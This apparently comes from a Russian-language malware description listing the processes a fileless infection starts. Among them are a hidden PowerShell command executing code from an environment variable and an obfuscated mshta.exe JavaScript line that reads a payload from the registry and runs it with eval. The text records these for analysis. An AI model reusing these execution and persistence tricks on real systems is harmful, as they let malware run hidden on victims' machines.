Техническая информация
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:mxal' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' javascript:Jpe7ePvc5i="mMLzU5gL";G4L=new%20ActiveXObject("WScript.Shell");aJwkfDw1i="8WJrTja4uo";nRO9y=G4L.RegRead("HKLM\\software\\Wow6432Node\\XUmhqDH3M\\1qokRh");M1FEQzeu9="t";eval(nRO9y);RN...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:mxal
- '%WINDIR%\syswow64\regsvr32.exe'